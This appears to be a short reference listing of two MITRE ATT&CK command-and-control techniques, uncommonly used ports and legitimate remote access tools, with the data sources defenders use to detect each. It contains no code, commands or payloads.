Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre